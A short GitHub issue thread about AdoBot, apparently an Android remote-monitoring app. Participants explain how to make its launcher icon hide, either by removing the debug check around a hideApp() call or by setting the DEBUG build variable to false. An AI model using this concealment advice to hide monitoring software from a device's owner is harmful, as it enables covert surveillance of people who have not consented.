### ISSUE TITLE
application icon hide

### ISSUE THREAD

**Issue by sureshchitmil** [adonespitogo/AdoBot#2]
icon not hiding

**Comment by chandanl** [comment]
In the java file app/src/main/java/com/android/adobot/activities/SetupActivity.java
find line saying :

if (!BuildConfig.DEBUG) hideApp();

Now remove the if condition leaving hideApp(); method
After Modification it should look like this

hideapp();

Then compile the app
Now the icon should hide after the first launch and restarting. :)

**Comment by adonespitogo** [comment]
I think there was a setting in gradle to set build config variables - that includes the `DEBUG` variable. Set `DEBUG` to `false` for the app to actually hide when compiled.
